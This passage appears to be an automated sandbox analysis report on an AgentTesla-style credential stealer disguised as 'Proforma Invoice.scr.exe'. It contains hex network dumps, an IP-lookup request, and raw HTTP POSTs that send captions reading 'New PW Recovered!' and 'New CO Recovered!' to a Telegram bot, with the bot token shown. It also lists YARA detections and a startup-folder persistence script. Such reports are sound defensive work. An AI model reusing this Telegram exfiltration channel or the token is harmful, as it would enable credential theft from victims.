                                                                                        2024-10-31 10:14:39 UTC8009INData Raw: 59 bb 59 98 8d d4 55 48 67 9b 07 a4 9a 0d d0 0d 3d d7 99 85 ff a3 70 3c ba 9f 1e 89 cc 9c 62 8e 1c 97 e3 0b 75 14 48 11 7f ea 8b 97 3d 0f c3 88 2f d8 6a 05 59 1f a2 e0 d9 e9 32 25 a6 e6 ef 87 3b 59 70 8b b6 70 d9 78 4e ae 79 bc 01 57 4c 80 94 78 47 3c c7 34 02 a3 2c 07 f4 57 8e 1d 74 c2 5d d3 be 60 1f 42 e4 ca e0 93 68 6c 35 92 40 2f 8f 84 ef 6d 82 6c 90 e4 9f 3c 10 50 b9 8d a5 29 aa b5 43 56 36 53 50 a2 63 12 7e 59 a1 be 7a 9e 2c b5 d3 39 6f 23 f5 81 25 53 30 23 97 d1 f5 6d d0 da e5 7d b3 b0 d2 0f 53 87 71 34 8e 27 60 21 a1 3f 88 b8 9f 06 e2 1d 64 0c 74 3d ee 0a 41 cb b5 c7 99 24 25 4e 70 3a dc 7c ba 13 e5 52 d4 d8 26 db f9 de cb ef 77 ee 62 5c 9e 47 d2 2d 97 bb 0e 7d d7 8e 76 16 5a 54 57 d9 7d 06 77 24 cd b8 f3 58 44 b2 f3 de 00 ef a5 31 98 bc 45 6a 00
                                                                                        Data Ascii: YYUHg=p<buH=/jY2%;YppxNyWLxG<4,Wt]`Bhl5@/ml<P)CV6SPc~Yz,9o#%S0#m}Sq4'`!?dt=A$%Np:|R&wb\G-}vZTW}w$XD1Ej
                                                                                        2024-10-31 10:14:39 UTC8000INData Raw: 01 02 e7 a5 2c 6d 09 b0 1d cd 54 5c 0e 03 44 55 72 71 57 9f 5b fd b3 2a 88 54 8e e9 9d 4c a9 3c 01 68 89 45 64 ff 17 c8 9d 47 30 41 75 35 3b 55 48 35 a6 e1 4f c6 1b 25 a9 94 cc ae 65 47 b4 8e 57 68 f8 38 d0 a8 e2 66 b0 98 33 66 ab 90 e3 e1 b2 94 0c 71 9a 41 17 21 f0 d5 9c ef 50 b3 32 1e 91 f3 68 b4 dd 49 bc e2 b3 58 6b 8c ea 10 45 3c 62 7c 3c 43 7d ee bf 91 0a 3e 1d f9 a5 7a 7e 7d cd 6f 85 b9 ba 00 44 76 50 d4 cf 9d 44 d0 8d e3 58 d4 64 df 27 fa cf fd 66 bc ac 13 c6 6f 36 4b 28 30 eb 60 57 7a 7e 37 60 4e b3 2e f2 76 8a 14 61 63 50 23 7a ed 4a ad 6b 2f 2c 19 5f 47 a5 4e 1b e8 02 89 7f 86 4a ab 92 91 90 05 0d 27 12 b3 b5 bf 1d 93 a6 4a 0f 0b 84 07 5e 41 cd bd c5 2f d9 65 d8 9e b1 f7 ce 68 1b ae 64 91 98 20 20 31 6c 45 5b 16 89 21 39 7e f2 9f c0 eb 9e 21 30
                                                                                        Data Ascii: ,mT\DUrqW[*TL<hEdG0Au5;UH5O%eGWh8f3fqA!P2hIXkE<b|<C}>z~}oDvPDXd'fo6K(0`Wz~7`N.vacP#zJk/,_GNJ'J^A/ehd 1lE[!9~!0
                                                                                        2024-10-31 10:14:39 UTC8000INData Raw: e2 e9 53 fc de 7c 50 50 38 fc 2c 51 fb db 76 40 e1 ce 7e 7e b2 8d df 60 76 81 e3 1e a4 10 ed 88 e3 3e a3 4b 27 30 20 d4 10 44 b5 f6 ee 0a ad 79 e8 82 be 25 b7 96 b1 a8 1c a9 4e 1a f1 98 a9 8c a4 76 08 70 84 55 82 c0 74 40 53 2d 43 53 72 fb 45 ac 46 a7 02 73 71 10 be 43 73 3c 53 a8 ef f9 37 dc f0 75 3a 9d 59 40 50 11 73 b5 d8 50 08 fb f3 d5 14 03 27 95 ba 04 12 5f 34 d0 7b 84 19 44 55 a4 12 23 d1 34 b1 51 e7 65 a7 c2 8c e3 0d 0a 0a b3 2f 40 c4 c3 ff 31 b7 09 fa 2f 9e ed 32 05 db 82 4e 79 35 2e 2c 47 91 65 a6 8d 9c 27 4c 12 40 1a bd ea ff eb 47 70 f0 a7 2a 40 fd f0 8b 97 c7 a1 21 9d 9c 8f cd a7 40 25 f0 2f ee 39 4f 4f e9 e4 30 66 01 b0 d0 ac fc 0c cb 44 29 20 40 a2 92 ca 7d 3c 16 ad 6e 76 52 23 ce 92 30 2d 7a cb a9 21 f8 b0 54 26 c5 f1 d4 0d 21 2e f3 47 31
                                                                                        Data Ascii: S|PP8,Qv@~~`v>K'0 Dy%NvpUt@S-CSrEFsqCs<S7u:Y@PsP'_4{DU#4Qe/@1/2Ny5.,Ge'L@Gp*@!@%/9OO0fD) @}<nvR#0-z!T&!.G1
                                                                                        2024-10-31 10:14:39 UTC8000INData Raw: 0b 80 a0 b1 ad 67 45 43 81 62 83 11 15 27 5e f9 e9 5b dd 29 15 aa ec dc 36 5b 8d 3e 84 12 66 9c 64 82 48 a6 24 1c b1 e0 bc a1 65 0f 01 dc b5 17 ec 04 bf 81 35 21 f4 19 ba 33 5f ee 58 4e 0f ef 6e d3 72 95 c8 1d 31 f8 28 b3 99 d7 f8 03 4f 1f 2a f1 ec 12 5b 48 19 47 36 70 64 b1 53 87 ff fa 93 fb 98 7b 1b 42 e0 c2 28 7f 35 7d bb 4a 25 f7 d3 36 22 a0 d5 67 ed a1 9e bf 09 59 77 fd ec db 5c 72 e0 06 8f 2f d1 61 70 2d c0 4d b5 a5 a6 52 d5 1b f3 47 4f d7 32 98 1a 36 cd e7 d1 34 f9 9e d0 e4 2c c8 31 b5 b1 72 f8 1a 1b af 41 d6 4e e4 74 d1 f4 5b e2 4a cd af fb 85 0f 44 a6 23 67 f1 9f 9d 5a 34 b6 0a 1a 48 d1 7a a6 c9 85 a4 c2 9e a2 74 56 07 f8 5d 80 53 0e f5 8d 2b 37 b9 16 b2 58 58 11 fa b0 3e 30 ef b1 f6 82 80 cc cf 42 1c 15 01 e3 f6 6a 49 b4 33 08 9e 9b 80 c8 fe cf
                                                                                        Data Ascii: gECb'^[)6[>fdH$e5!3_XNnr1(O*[HG6pdS{B(5}J%6"gYw\r/ap-MRGO264,1rANt[JD#gZ4HztV]S+7XX>0BjI3
                                                                                        2024-10-31 10:14:39 UTC8000INData Raw: 31 84 60 23 6b 85 68 83 b6 ea 32 0d e3 00 4e e7 ca 7b 67 04 ba 83 0f 51 62 8f ee 83 ec 23 32 f1 c7 c7 52 32 ab 7d 02 24 a4 d0 e8 ef e5 5c ad 14 30 23 32 b9 cd d9 8e 37 6b a1 39 6a ce fc e6 d2 8a 92 68 66 c6 59 d1 f2 1e b5 43 7c 24 2a 51 55 36 35 d6 e2 51 fa 3c 1d 7e f3 d3 6b 97 fb 91 e1 8d e8 51 fb de 22 43 97 b0 7c a4 02 a6 7b 17 92 0f d1 87 dc 98 a7 9e 43 d0 cf 48 8d 9e f9 70 74 f7 ac 1a 73 5c 90 15 eb 67 84 ed 47 8f 6d c5 4b cd 64 81 41 2a 3a ce 0a bd fd bc ad b0 55 24 78 83 fe 31 96 b8 c2 0a a9 66 a8 15 6e 72 3f d1 5f 04 3c 66 7b 4f 54 58 a9 49 47 63 83 ac cd 0c 7d a5 c0 1c a8 02 44 c6 72 1e 7b 08 f9 c3 74 ea 10 26 6a 02 3b cc bd 35 45 89 16 15 5f 43 9d de 14 2f a9 ee 81 a8 8f 89 da 91 ab 0b 58 d5 e2 02 0a 75 8c fc 27 ec 57 f7 3c 25 2b 36 16 d0 f1 3b
                                                                                        Data Ascii: 1`#kh2N{gQb#2R2}$\0#27k9jhfYC|$*QU65Q<~kQ"C|{CHpts\gGmKdA*:U$x1fnr?_<f{OTXIGc}Dr{t&j;5E_C/Xu'W<%+6;
                                                                                        2024-10-31 10:14:40 UTC8000INData Raw: 71 7a a2 5f 86 b3 66 30 48 15 e4 74 2a 44 8c 72 d9 d6 3e ea c9 48 54 4b 8e bb 7a a2 cd ec 5f ac 0a 60 84 10 5e 38 2e 13 40 5e ff 01 e4 7b 19 a6 56 ac 72 fa 71 04 3d 5e b4 eb 4f c1 52 a9 13 dc 35 b5 ed 3f 68 93 3f 52 1f e3 af ae 52 aa 32 fe d4 eb 23 44 f5 5e 92 b4 ce ad 73 1f dc 9f 8f 34 90 70 0d 92 24 37 3a fb 47 50 3d 71 25 0b 10 e9 f5 fc 99 6c 91 97 fb 41 e9 4b e8 86 f1 0d 94 9c da ba 64 e0 75 32 7f 35 a7 62 4a f0 e0 63 74 6f 5d 19 e2 24 a0 4b 37 da b3 17 49 a4 c8 95 33 35 30 3d df f7 5a d4 7b 66 96 38 59 a6 59 1a ca db 69 54 a8 b9 af 35 20 cd 76 4d 1d 2c 19 9b ff 4c f4 29 e9 86 3f 3e 35 ec 65 60 4e b6 49 ea e4 ac 16 62 df d1 f2 04 02 25 fc ff 9a d2 cf 08 e6 da 2f b0 1c 43 ce 67 bc 07 5d f7 ae 91 a0 09 d3 bc 63 3c 87 13 01 2d 2e 29 8b b1 4f e0 d0 75 68
                                                                                        Data Ascii: qz_f0Ht*Dr>HTKz_`^8.@^{Vrq=^OR5?h?RR2#D^s4p$7:GP=q%lAKdu25bJcto]$K7I350=Z{f8YYiT5 vM,L)?>5e`NIb%/Cg]c<-.)Ouh
                                                                                        2024-10-31 10:14:40 UTC8000INData Raw: 6a ac 42 36 6f 79 0d 93 6d 09 6e ba 3c e6 2a ef b1 9e b0 25 7c 4b 8f a2 f2 3c 6c 2e 62 28 21 ac c3 2d 5d 5c e2 16 23 6d 1b 10 08 5c 03 51 39 01 51 f9 d0 a8 2a 8b d2 18 f8 38 bd d1 7a da 25 6a e8 fa c6 75 a3 12 71 a9 9f 66 c8 51 b0 0d 43 0f 89 8a 94 c4 60 30 53 f1 d9 5e ed 15 02 25 d3 79 97 6b ad bf 93 51 6b 6e 9b a9 34 3d c4 df 43 38 fe 5b 8f 78 4f e5 9e d9 29 29 9a 9f 85 61 94 2a 05 be 12 4f 33 0d ef 3f ba 29 5e 81 af 5e 13 c2 ee 95 82 8e 9b fb bd 23 42 d7 2b 57 a8 05 d8 65 d4 81 46 05 37 01 60 b9 86 f6 fa ed 90 80 3f 80 01 36 4c c4 6d fb 2e 45 e0 6d f2 2b 49 c7 72 1a 4a 25 a8 04 ca f0 d5 d5 f8 25 ef ab 99 cd e2 39 c6 5e 0b 6e ec df d0 25 3e b3 a2 a5 1e 59 2a d8 17 ff 7c 15 d9 8b 66 30 18 77 ed 05 8d cf 02 6f 87 bd d6 4f bb 64 a1 81 56 6d 92 08 c6 d7 d5
                                                                                        Data Ascii: jB6oymn<*%|K<l.b(!-]\#m\Q9Q*8z%juqfQC`0S^%ykQkn4=C8[xO))a*O3?)^^#B+WeF7`?6Lm.Em+IrJ%%9^n%>Y*|f0woOdVm
                                                                                        2024-10-31 10:14:40 UTC8000INData Raw: 58 0b 75 38 13 e9 fd 66 20 8a dd 63 aa ea 4d 45 ec dd 82 1e 90 ba 1a 10 68 a3 7f 6a 37 7c 2e 04 f4 56 80 1e 3a 0d 3e d7 4d 1a 97 7c b6 46 a1 d2 a1 bb a6 06 67 ff b8 eb a3 92 4f 52 97 7e 71 be d4 72 28 19 89 93 e9 a0 de 03 5e d0 31 06 bd 4c 25 0c 3a da 9c 64 9b 1e 5f ca 21 58 6e 16 b9 4a 2b bf 22 13 ca 24 fe 9b cf c8 70 01 7c 39 be c6 4a 5e f7 ae 8f e4 59 7b 22 fc 61 bd 19 ad 0a 59 ae 3b 5f 72 2e bf ba f5 8c 46 d3 24 3c 4c 28 76 df bf 61 75 ae a6 ad 15 24 b5 8a 18 a1 7e f1 ff eb 0f 12 14 4c 46 a1 98 99 3d ef 96 bf ea 35 62 05 9f 2f bb 26 2e 5f 32 86 34 64 e8 48 a1 6d e2 43 0a da f2 1b e3 81 7f 2d 48 e0 77 61 b6 26 aa 63 58 5c 43 58 a9 68 22 87 ae 8e 45 17 49 b2 fd 94 ee 02 ed 38 d3 c7 07 f9 b6 46 39 b1 91 75 21 49 22 8f a9 f6 fb b5 11 55 b7 0f 99 cc 70 a2
                                                                                        Data Ascii: Xu8f cMEhj7|.V:>M|FgOR~qr(^1L%:d_!XnJ+"$p|9J^Y{"aY;_r.F$<L(vau$~LF=5b/&._24dHmC-Hwa&cX\CXh"EI8F9u!I"Up
                                                                                        2024-10-31 10:14:40 UTC8000INData Raw: 67 4e a2 0d 91 aa 1e 2f 29 ef 2f d4 fd 61 26 05 b2 7f 52 7f 86 5a 80 fa b2 7c 7a 5c ab cb a2 7f 90 07 18 02 49 00 e7 da b2 b4 a4 99 85 9a e1 25 df b1 67 5c f3 a5 76 0f 19 7d 6c 4c 71 9d e2 79 aa dd b9 f2 83 75 9d 8e c4 98 c4 0b 97 c9 68 64 47 73 8e 87 43 be 55 1d f4 a5 0d 81 a5 a0 d5 06 3d 7d ea 08 16 e0 9e 21 64 cb 67 df cc 72 f5 f4 2b 97 c8 19 21 a0 94 b9 82 8d 3e 55 97 c2 09 4a f8 b0 8a 2f 2a 30 68 2d 94 59 f9 fe d1 c3 94 4d 7a 1a 5d dc 01 a7 87 b3 ce 34 af 9f a0 74 34 37 4f 1c 11 e3 1e 9e 11 60 c9 43 9b 97 d7 a8 e9 7a bb e6 ce 8e 36 c6 ff c0 d1 8c 35 9a e6 06 21 25 6b 72 6e cd bd 97 c6 eb df 50 a3 5c f4 34 d8 00 54 06 22 60 33 23 2c 15 55 81 1d b4 e9 fe 17 c5 db 2e 19 9d f4 d7 06 6a ea 51 21 73 59 58 61 ab fd 95 f9 9a f2 49 15 23 e4 dd 93 2d 71 2f b6
                                                                                        Data Ascii: gN/)/a&RZ|z\I%g\v}lLqyuhdGsCU=}!dgr+!>UJ/*0h-YMz]4t47O`Cz65!%krnP\4T"`3#,U.jQ!sYXaI#-q/
                                                                                        2024-10-31 10:14:40 UTC8000INData Raw: 96 0d f3 44 09 89 1e 52 9f 12 52 1c 54 4f a5 3f db 88 c0 e6 93 fb 3e 26 95 39 98 bc e2 70 f8 42 14 16 e3 ac e8 82 ea 51 3a 12 ee 28 ba eb dd ca 11 42 55 31 33 c9 40 28 d5 9c 2e 44 0f 07 ec c9 9d 25 07 4c a3 63 33 1a d9 51 56 dd a6 ca 26 db 22 1d 49 f5 aa 16 53 a6 17 84 53 7f 0d e7 94 05 a7 a3 3e 61 19 d6 6c e4 3f 2f 0e 8d fe 95 22 1b 1f 3c 2e 1b b4 d2 1d 0f 75 62 1e 6b f7 33 c4 9f b7 5f f9 c1 26 ee ee e3 6c 32 0d f5 0c 2d db 09 1a ae 4f 86 bc d7 1a 9e 24 7b 7d ad 41 24 4b 99 77 87 25 dc 09 0c 15 90 e4 00 14 09 9c b8 f4 52 69 8d 72 2d 39 8e aa 65 cd 2d d7 54 8d 43 ea e3 b8 1f 76 cb 60 12 30 45 65 ae 01 51 2b e1 d0 0b c7 b6 df 36 d6 f7 f9 e1 34 c1 e5 92 f2 46 f7 27 ae 05 bf e6 5e a0 f5 d6 8a 75 d0 d9 b6 1f c2 e0 ab 91 5a 02 7b b4 fa 10 95 07 d5 41 48 23 c8
                                                                                        Data Ascii: DRRTO?>&9pBQ:(BU13@(.D%Lc3QV&"ISS>al?/"<.ubk3_&l2-O${}A$Kw%Rir-9e-TCv`0EeQ+64F'^uZ{AH#


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.651774104.26.13.2054435868C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:55 UTC155OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                        Host: api.ipify.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-31 10:14:56 UTC211INHTTP/1.1 200 OK
                                                                                        Date: Thu, 31 Oct 2024 10:14:56 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8db2e1881c20e85f-DFW
                                                                                        2024-10-31 10:14:56 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                                                        Data Ascii: 173.254.250.77


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.651775149.154.167.2204435868C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:57 UTC260OUTPOST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf973572514ec
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 981
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-31 10:14:57 UTC981OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 37 33 35 37 32 35 31 34 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 38 38 32 39 33 39 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 37 33 35 37 32 35 31 34 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 33 31 2f 32 30 32 34 20 30 36 3a 31 34 3a 35 35 0a 55 73 65 72
                                                                                        Data Ascii: -----------------------------8dcf973572514ecContent-Disposition: form-data; name="chat_id"7068829394-----------------------------8dcf973572514ecContent-Disposition: form-data; name="caption"New PW Recovered!Time: 10/31/2024 06:14:55User
                                                                                        2024-10-31 10:14:58 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-10-31 10:14:58 UTC402INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 31 Oct 2024 10:14:58 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 56
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.651776149.154.167.2204435868C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:59 UTC236OUTPOST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf9857b3d199b
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 918
                                                                                        Expect: 100-continue
                                                                                        2024-10-31 10:14:59 UTC918OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 38 35 37 62 33 64 31 39 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 38 38 32 39 33 39 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 38 35 37 62 33 64 31 39 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 33 31 2f 32 30 32 34 20 30 38 3a 32 34 3a 34 37 0a 55 73 65 72
                                                                                        Data Ascii: -----------------------------8dcf9857b3d199bContent-Disposition: form-data; name="chat_id"7068829394-----------------------------8dcf9857b3d199bContent-Disposition: form-data; name="caption"New CO Recovered!Time: 10/31/2024 08:24:47User
                                                                                        2024-10-31 10:14:59 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-10-31 10:14:59 UTC402INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 31 Oct 2024 10:14:59 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 56
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:06:14:04
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Proforma Invoice.scr.exe"
                                                                                        Imagebase:0x280000
                                                                                        File size:13'312 bytes
                                                                                        MD5 hash:3EFCF6123CC2697D54BE8E8D17F70EB6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2480782000.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:06:14:24
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        Imagebase:0x270000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2755078286.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:06:14:36
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs"
                                                                                        Imagebase:0x7ff790870000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:06:14:37
                                                                                        Start date:31/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\EncoderFallback.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\EncoderFallback.exe"
                                                                                        Imagebase:0x8e0000
                                                                                        File size:13'312 bytes
                                                                                        MD5 hash:3EFCF6123CC2697D54BE8E8D17F70EB6
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
